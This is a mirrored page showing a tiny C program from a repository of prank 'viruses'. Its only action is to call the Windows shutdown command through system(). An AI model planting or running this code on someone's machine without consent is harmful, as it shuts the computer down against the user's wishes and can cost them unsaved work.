mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2026-01-16 06:42:28 -08:00
11 lines
142 B
C
11 lines
142 B
C
/**
|
|
* Developer: Minhas Kamal
|
|
* Functionality: Simply shuts down the system.
|
|
**/
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
system("shutdown -s");
|
|
}
|